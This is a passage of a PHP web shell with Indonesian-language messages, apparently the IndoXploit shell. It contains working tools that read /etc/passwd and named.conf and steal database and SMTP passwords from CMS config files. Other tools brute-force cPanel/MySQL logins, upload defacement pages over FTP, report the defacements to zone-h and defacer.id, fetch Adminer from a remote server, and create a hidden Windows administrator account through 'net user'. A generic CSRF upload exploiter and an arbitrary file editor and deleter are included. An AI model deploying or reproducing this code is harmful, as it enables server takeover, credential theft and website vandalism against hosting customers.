  724. $domain_cp = file_get_contents("/etc/named.conf");
  725. if($domain_cp == '') {
  726. $dom = "<font color=red>gabisa ambil nama domain nya</font>";
  727. } else {
  728. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  729. foreach($domains_cp[1] as $dj) {
  730. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  731. $user_cp_url = $user_cp_url['name'];
  732. if($user_cp_url == $ucp) {
  733. $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
  734. break;
  735. }
  736. }
  737. }
  738. } else {
  739. $dom = "<font color=red>function is Disable by system</font>";
  740. }
  741. echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
  742. }
  743. }
  744. }
  745. }
  746. }
  747. if($i == 0) {
  748. } else {
  749. echo "<br>sukses nyolong ".$i." <font color=lime>.</font>";
  750. }
  751. } else {
  752. echo "<center>
  753. <form method='post'>
  754. USER: <br>
  755. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  756. $_usercp = fopen("/etc/passwd","r");
  757. while($getu = fgets($_usercp)) {
  758. if($getu == '' || !$_usercp) {
  759. echo "<font color=red>Can't read /etc/passwd</font>";
  760. } else {
  761. preg_match_all("/(.*?):x:/", $getu, $u);
  762. foreach($u[1] as $user_cp) {
  763. if(is_dir("/home/$user_cp/public_html")) {
  764. echo "$user_cp\n";
  765. }
  766. }
  767. }
  768. }
  769. echo "</textarea><br>
  770. PASS: <br>
  771. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  772. function cp_pass($dir) {
  773. $pass = "";
  774. $dira = scandir($dir);
  775. foreach($dira as $dirb) {
  776. if(!is_file("$dir/$dirb")) continue;
  777. $ambil = file_get_contents("$dir/$dirb");
  778. if(preg_match("/WordPress/", $ambil)) {
  779. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  780. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  781. $pass .= ambilkata($ambil,"password = '","'")."\n";
  782. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  783. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  784. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  785. $pass .= ambilkata($ambil,'password = "','"')."\n";
  786. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  787. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  788. } elseif(preg_match("/^[client]$/", $ambil)) {
  789. preg_match("/password=(.*?)/", $ambil, $pass1);
  790. if(preg_match('/"/', $pass1[1])) {
  791. $pass1[1] = str_replace('"', "", $pass1[1]);
  792. $pass .= $pass1[1]."\n";
  793. } else {
  794. $pass .= $pass1[1]."\n";
  795. }
  796. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  797. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  798. }
  799. }
  800. echo $pass;
  801. }
  802. $cp_pass = cp_pass($dir);
  803. echo $cp_pass;
  804. echo "</textarea><br>
  805. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  806. </form>
  807. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  808. }
  809. } elseif($_GET['do'] == 'cpftp_auto') {
  810. if($_POST['crack']) {
  811. $usercp = explode("\r\n", $_POST['user_cp']);
  812. $passcp = explode("\r\n", $_POST['pass_cp']);
  813. $i = 0;
  814. foreach($usercp as $ucp) {
  815. foreach($passcp as $pcp) {
  816. if(@mysql_connect('localhost', $ucp, $pcp)) {
  817. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  818. } else {
  819. $_SESSION[$ucp] = "1";
  820. $_SESSION[$pcp] = "1";
  821. if($ucp == '' || $pcp == '') {
  822. //
  823. } else {
  824. echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  825. $ftp_conn = ftp_connect(gethostbyname($_SERVER['HTTP_HOST']));
  826. $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
  827. if((!$ftp_login) || (!$ftp_conn)) {
  828. echo "[+] <font color=red>Login Gagal</font><br><br>";
  829. } else {
  830. echo "[+] <font color=lime>Login Sukses</font><br>";
  831. $fi = htmlspecialchars($_POST['file_deface']);
  832. $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
  833. if($deface) {
  834. $i++;
  835. echo "[+] <font color=lime>Deface Sukses</font><br>";
  836. if(function_exists('posix_getpwuid')) {
  837. $domain_cp = file_get_contents("/etc/named.conf");
  838. if($domain_cp == '') {
  839. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  840. } else {
  841. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  842. foreach($domains_cp[1] as $dj) {
  843. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  844. $user_cp_url = $user_cp_url['name'];
  845. if($user_cp_url == $ucp) {
  846. echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
  847. break;
  848. }
  849. }
  850. }
  851. } else {
  852. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  853. }
  854. } else {
  855. echo "[-] <font color=red>Deface Gagal</font><br><br>";
  856. }
  857. }
  858. //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  859. }
  860. }
  861. }
  862. }
  863. }
  864. if($i == 0) {
  865. } else {
  866. echo "<br>sukses deface ".$i." Cpanel <font color=lime>.</font>";
  867. }
  868. } else {
  869. echo "<center>
  870. <form method='post'>
  871. Filename: <br>
  872. <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
  873. Deface Page: <br>
  874. <input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
  875. USER: <br>
  876. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  877. $_usercp = fopen("/etc/passwd","r");
  878. while($getu = fgets($_usercp)) {
  879. if($getu == '' || !$_usercp) {
  880. echo "<font color=red>Can't read /etc/passwd</font>";
  881. } else {
  882. preg_match_all("/(.*?):x:/", $getu, $u);
  883. foreach($u[1] as $user_cp) {
  884. if(is_dir("/home/$user_cp/public_html")) {
  885. echo "$user_cp\n";
  886. }
  887. }
  888. }
  889. }
  890. echo "</textarea><br>
  891. PASS: <br>
  892. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  893. function cp_pass($dir) {
  894. $pass = "";
  895. $dira = scandir($dir);
  896. foreach($dira as $dirb) {
  897. if(!is_file("$dir/$dirb")) continue;
  898. $ambil = file_get_contents("$dir/$dirb");
  899. if(preg_match("/WordPress/", $ambil)) {
  900. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  901. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  902. $pass .= ambilkata($ambil,"password = '","'")."\n";
  903. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  904. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  905. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  906. $pass .= ambilkata($ambil,'password = "','"')."\n";
  907. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  908. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  909. } elseif(preg_match("/client/", $ambil)) {
  910. preg_match("/password=(.*)/", $ambil, $pass1);
  911. if(preg_match('/"/', $pass1[1])) {
  912. $pass1[1] = str_replace('"', "", $pass1[1]);
  913. $pass .= $pass1[1]."\n";
  914. }
  915. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  916. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  917. }
  918. }
  919. echo $pass;
  920. }
  921. $cp_pass = cp_pass($dir);
  922. echo $cp_pass;
  923. echo "</textarea><br>
  924. <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
  925. </form>
  926. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  927. }
  928. }elseif($_GET['do'] == 'defacerid') {
  929. echo "<center><form method='post'>
  930. <u>Defacer</u>: <br>
  931. <input type='text' name='hekel' size='50' value='Fuck'><br>
  932. <u>Team</u>: <br>
  933. <input type='text' name='tim' size='50' value='XaiSyndicate'><br>
  934. <u>Domains</u>: <br>
  935. <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
  936. <input type='submit' name='go' value='Submit' style='width: 450px;'>
  937. </form>";
  938. $site = explode("\r\n", $_POST['sites']);
  939. $go = $_POST['go'];
  940. $hekel = $_POST['hekel'];
  941. $tim = $_POST['tim'];
  942. if($go) {
  943. foreach($site as $sites) {
  944. $zh = $sites;
  945. $form_url = "https://www.defacer.id/notify";
  946. $data_to_post = array();
  947. $data_to_post['attacker'] = "$hekel";
  948. $data_to_post['team'] = "$tim";
  949. $data_to_post['poc'] = 'SQL Injection';
  950. $data_to_post['url'] = "$zh";
  951. $curl = curl_init();
  952. curl_setopt($curl,CURLOPT_URL, $form_url);
  953. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
  954. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
  955. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
  956. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  957. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
  958. $result = curl_exec($curl);
  959. echo $result;
  960. curl_close($curl);
  961. echo "<br>";
  962. }
  963. }
  964. } elseif($_GET['do'] == 'smtp') {
  965. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  966. function scj($dir) {
  967. $dira = scandir($dir);
  968. foreach($dira as $dirb) {
  969. if(!is_file("$dir/$dirb")) continue;
  970. $ambil = file_get_contents("$dir/$dirb");
  971. $ambil = str_replace("$", "", $ambil);
  972. if(preg_match("/JConfig|joomla/", $ambil)) {
  973. $smtp_host = ambilkata($ambil,"smtphost = '","'");
  974. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  975. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  976. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  977. $smtp_port = ambilkata($ambil,"smtpport = '","'");
  978. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  979. echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
  980. echo "SMTP port: <font color=lime>$smtp_port</font><br>";
  981. echo "SMTP user: <font color=lime>$smtp_user</font><br>";
  982. echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
  983. echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
  984. echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
  985. }
  986. }
  987. }
  988. $smpt_hunter = scj($dir);
  989. echo $smpt_hunter;
  990.  
  991. } elseif($_GET['do'] == 'zoneh') {
  992. if($_POST['submit']) {
  993. $domain = explode("\r\n", $_POST['url']);
  994. $nick = $_POST['nick'];
  995. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  996. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  997. function zoneh($url,$nick) {
  998. $ch = curl_init("http://www.zone-h.com/notify/single");
  999. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1000. curl_setopt($ch, CURLOPT_POST, true);
  1001. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  1002. return curl_exec($ch);
  1003. curl_close($ch);
  1004. }
  1005. foreach($domain as $url) {
  1006. $zoneh = zoneh($url,$nick);
  1007. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  1008. echo "$url -> <font color=lime>OK</font><br>";
  1009. } else {
  1010. echo "$url -> <font color=red>ERROR</font><br>";
  1011. }
  1012. }
  1013. } else {
  1014. echo "<center><form method='post'>
  1015. <u>Defacer</u>: <br>
  1016. <input type='text' name='nick' size='50' value='XaiSyndicate'><br>
  1017. <u>Domains</u>: <br>
  1018. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  1019. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  1020. </form>";
  1021. }
  1022. echo "</center>";
  1023.  
  1024. } elseif($_GET['do'] == 'adminer') {
  1025. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1026. function adminer($url, $isi) {
  1027. $fp = fopen($isi, "w");
  1028. $ch = curl_init();
  1029. curl_setopt($ch, CURLOPT_URL, $url);
  1030. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  1031. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1032. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  1033. curl_setopt($ch, CURLOPT_FILE, $fp);
  1034. return curl_exec($ch);
  1035. curl_close($ch);
  1036. fclose($fp);
  1037. ob_flush();
  1038. flush();
  1039. }
  1040. if(file_exists('adminer.php')) {
  1041. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1042. } else {
  1043. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  1044. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1045. } else {
  1046. echo "<center><font color=red>gagal buat file adminer</font></center>";
  1047. }
  1048. }
  1049. } elseif($_GET['do'] == 'csrfup')
  1050. {
  1051. echo '<html>
  1052. <center><h1 style="font-size:33px;">CSRF Exploiter Online</h1><br><br>
  1053. <font size="3">*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc</font>
  1054. <br><br>
  1055. <form method="post" style="font-size:25px;">
  1056. URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/path/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
  1057. POST File: <input type="text" name="pf" size="50" height="10" placeholder="Lihat diatas ^" style="margin: 5px auto; padding-left: 5px;" required><br>
  1058. <input type="submit" name="d" value="Lock!">
  1059. </form>';
  1060. $url = $_POST["url"];
  1061. $pf = $_POST["pf"];
  1062. $d = $_POST["d"];
  1063. if($d) {
  1064. echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Upload'></form></form>
  1065. </html>";
  1066. }
  1067. } elseif($_GET['do'] == 'tools') {
  1068. echo "<iframe src='http://loscardos.ye.vc/' width='100%' height='100%' frameborder='0' scrolling='yes'></iframe>";
  1069. } elseif($_GET['do'] == 'krdp_shell') {
  1070. if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
  1071. if($_POST['create']) {
  1072. $user = htmlspecialchars($_POST['user']);
  1073. $pass = htmlspecialchars($_POST['pass']);
  1074. if(preg_match("/$user/", exe("net user"))) {
  1075. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
  1076. } else {
  1077. $add_user = exe("net user $user $pass /add");
  1078. $add_groups1 = exe("net localgroup Administrators $user /add");
  1079. $add_groups2 = exe("net localgroup Administrator $user /add");
  1080. $add_groups3 = exe("net localgroup Administrateur $user /add");
  1081. echo "[ RDP ACCOUNT INFO ]<br>
  1082. ------------------------------<br>
  1083. IP: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font><br>
  1084. Username: <font color=lime>$user</font><br>
  1085. Password: <font color=lime>$pass</font><br>
  1086. ------------------------------<br><br>
  1087. [ STATUS ]<br>
  1088. ------------------------------<br>
  1089. ";
  1090. if($add_user) {
  1091. echo "[add user] -> <font color='lime'>Berhasil</font><br>";
  1092. } else {
  1093. echo "[add user] -> <font color='red'>Gagal</font><br>";
  1094. }
  1095. if($add_groups1) {
  1096. echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
  1097. } elseif($add_groups2) {
  1098. echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
  1099. } elseif($add_groups3) {
  1100. echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
  1101. } else {
  1102. echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
  1103. }
  1104. echo "------------------------------<br>";
  1105. }
  1106. } elseif($_POST['s_opsi']) {
  1107. $user = htmlspecialchars($_POST['r_user']);
  1108. if($_POST['opsi'] == '1') {
  1109. $cek = exe("net user $user");
  1110. echo "Checking username <font color=lime>$user</font> ....... ";
  1111. if(preg_match("/$user/", $cek)) {
  1112. echo "[ <font color=lime>Sudah ada</font> ]<br>
  1113. ------------------------------<br><br>
  1114. <pre>$cek</pre>";
  1115. } else {
  1116. echo "[ <font color=red>belum ada</font> ]";
  1117. }
  1118. } elseif($_POST['opsi'] == '2') {
  1119. $cek = exe("net user $user indoxploit");
  1120. if(preg_match("/$user/", exe("net user"))) {
  1121. echo "[change password: <font color=lime>indoxploit</font>] -> ";
  1122. if($cek) {
  1123. echo "<font color=lime>Berhasil</font>";
  1124. } else {
  1125. echo "<font color=red>Gagal</font>";
  1126. }
  1127. } else {
  1128. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  1129. }
  1130. } elseif($_POST['opsi'] == '3') {
  1131. $cek = exe("net user $user /DELETE");
  1132. if(preg_match("/$user/", exe("net user"))) {
  1133. echo "[remove user: <font color=lime>$user</font>] -> ";
  1134. if($cek) {
  1135. echo "<font color=lime>Berhasil</font>";
  1136. } else {
  1137. echo "<font color=red>Gagal</font>";
  1138. }
  1139. } else {
  1140. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  1141. }
  1142. } else {
  1143. //
  1144. }
  1145. } else {
  1146. echo "-- Create RDP --<br>
  1147. <form method='post'>
  1148. <input type='text' name='user' placeholder='username' value='indoxploit' required>
  1149. <input type='text' name='pass' placeholder='password' value='indoxploit' required>
  1150. <input type='submit' name='create' value='>>'>
  1151. </form>
  1152. -- Option --<br>
  1153. <form method='post'>
  1154. <input type='text' name='r_user' placeholder='username' required>
  1155. <select name='opsi'>
  1156. <option value='1'>Cek Username</option>
  1157. <option value='2'>Ubah Password</option>
  1158. <option value='3'>Hapus Username</option>
  1159. </select>
  1160. <input type='submit' name='s_opsi' value='>>'>
  1161. </form>
  1162. ";
  1163. }
  1164. } else {
  1165. echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
  1166. }
  1167. } elseif($_GET['act'] == 'newfile') {
  1168. if($_POST['new_save_file']) {
  1169. $newfile = htmlspecialchars($_POST['newfile']);
  1170. $fopen = fopen($newfile, "a+");
  1171. if($fopen) {
  1172. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  1173. } else {
  1174. $act = "<font color=red>permission denied</font>";
  1175. }
  1176. }
  1177. echo $act;
  1178. echo "<form method='post'>
  1179. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  1180. <input type='submit' name='new_save_file' value='Submit'>
  1181. </form>";
  1182. } elseif($_GET['act'] == 'newfolder') {
  1183. if($_POST['new_save_folder']) {
  1184. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  1185. if(!mkdir($new_folder)) {
  1186. $act = "<font color=red>permission denied</font>";
  1187. } else {
  1188. $act = "<script>window.location='?dir=".$dir."';</script>";
  1189. }
  1190. }
  1191. echo $act;
  1192. echo "<form method='post'>
  1193. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  1194. <input type='submit' name='new_save_folder' value='Submit'>
  1195. </form>";
  1196. } elseif($_GET['act'] == 'rename_dir') {
  1197. if($_POST['dir_rename']) {
  1198. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  1199. if($dir_rename) {
  1200. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  1201. } else {
  1202. $act = "<font color=red>permission denied</font>";
  1203. }
  1204. echo "".$act."<br>";
  1205. }
  1206. echo "<form method='post'>
  1207. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  1208. <input type='submit' name='dir_rename' value='rename'>
  1209. </form>";
  1210. } elseif($_GET['act'] == 'delete_dir') {
  1211. $delete_dir = rmdir($dir);
  1212. if($delete_dir) {
  1213. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  1214. } else {
  1215. $act = "<font color=red>could not remove ".basename($dir)."</font>";
  1216. }
  1217. echo $act;
  1218. } elseif($_GET['act'] == 'view') {
  1219. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1220. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  1221. } elseif($_GET['act'] == 'edit') {
  1222. if($_POST['save']) {
  1223. $save = file_put_contents($_GET['file'], $_POST['src']);
  1224. if($save) {
  1225. $act = "<font color=lime>Saved!</font>";
  1226. } else {
  1227. $act = "<font color=red>permission denied</font>";
  1228. }
  1229. echo "".$act."<br>";
  1230. }
  1231. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1232. echo "<form method='post'>
  1233. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  1234. <input type='submit' value='Save' name='save' style='width: 500px;'>
  1235. </form>";
  1236. } elseif($_GET['act'] == 'rename') {
  1237. if($_POST['do_rename']) {
  1238. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  1239. if($rename) {
  1240. $act = "<script>window.location='?dir=".$dir."';</script>";
  1241. } else {
  1242. $act = "<font color=red>permission denied</font>";
  1243. }
  1244. echo "".$act."<br>";
  1245. }
  1246. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1247. echo "<form method='post'>
  1248. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  1249. <input type='submit' name='do_rename' value='rename'>
  1250. </form>";
  1251. } elseif($_GET['act'] == 'delete') {
  1252. $delete = unlink($_GET['file']);
  1253. if($delete) {
  1254. $act = "<script>window.location='?dir=".$dir."';</script>";
  1255. } else {
  1256. $act = "<font color=red>permission denied</font>";
  1257. }
  1258. echo $act;
  1259. } elseif(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  1260. @ob_clean();
  1261. $file = $_GET['file'];
  1262. @header('Content-Description: File Transfer');
  1263. @header('Content-Type: application/octet-stream');
  1264. @header('Content-Disposition: attachment; filename="'.basename($file).'"');
  1265. @header('Expires: 0');
  1266. @header('Cache-Control: must-revalidate');
  1267. @header('Pragma: public');
  1268. @header('Content-Length: ' . filesize($file));
  1269. readfile($file);
  1270. exit;
  1271. } else {
  1272. if(is_dir($dir) === true) {
  1273. if(!is_readable($dir)) {
  1274. echo "<font color=red>can't open directory. ( not readable )</font>";
  1275. } else {
  1276. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  1277. <tr>
  1278. <th class="th_home"><center>Name</center></th>
  1279. <th class="th_home"><center>Type</center></th>
  1280. <th class="th_home"><center>Size</center></th>
  1281. <th class="th_home"><center>Last Modified</center></th>
  1282. <th class="th_home"><center>Owner/Group</center></th>
  1283. <th class="th_home"><center>Permission</center></th>
  1284. <th class="th_home"><center>Action</center></th>
  1285. </tr>';
  1286. $scandir = scandir($dir);
  1287. foreach($scandir as $dirx) {
  1288. $dtype = filetype("$dir/$dirx");
  1289. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  1290. if(function_exists('posix_getpwuid')) {
  1291. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  1292. $downer = $downer['name'];
  1293. } else {
  1294. //$downer = $uid;
  1295. $downer = fileowner("$dir/$dirx");
  1296. }
  1297. if(function_exists('posix_getgrgid')) {
  1298. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  1299. $dgrp = $dgrp['name'];
  1300. } else {
  1301. $dgrp = filegroup("$dir/$dirx");
  1302. }
  1303. if(!is_dir("$dir/$dirx")) continue;
  1304. if($dirx === '..') {
  1305. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  1306. } elseif($dirx === '.') {
  1307. $href = "<a href='?dir=$dir'>$dirx</a>";
  1308. } else {
  1309. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  1310. }
  1311. if($dirx === '.' || $dirx === '..') {
  1312. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  1313. } else {
  1314. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  1315. }
  1316. echo "<tr>";
  1317. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  1318. echo "<td class='td_home'><center>$dtype</center></td>";
  1319. echo "<td class='td_home'><center>-</center></th></td>";
  1320. echo "<td class='td_home'><center>$dtime</center></td>";
  1321. echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
  1322. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  1323. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  1324. echo "</tr>";
  1325. }
  1326. }
  1327. } else {
  1328. echo "<font color=red>can't open directory.</font>";
  1329. }
  1330. foreach($scandir as $file) {
  1331. $ftype = filetype("$dir/$file");
  1332. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  1333. $size = filesize("$dir/$file")/1024;
  1334. $size = round($size,3);
  1335. if(function_exists('posix_getpwuid')) {
  1336. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
  1337. $fowner = $fowner['name'];
  1338. } else {
  1339. //$downer = $uid;
  1340. $fowner = fileowner("$dir/$file");
  1341. }
  1342. if(function_exists('posix_getgrgid')) {
  1343. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
  1344. $fgrp = $fgrp['name'];
  1345. } else {
  1346. $fgrp = filegroup("$dir/$file");
  1347. }
  1348. if($size > 1024) {
  1349. $size = round($size/1024,2). 'MB';
  1350. } else {
  1351. $size = $size. 'KB';
  1352. }
  1353. if(!is_file("$dir/$file")) continue;
  1354. echo "<tr>";
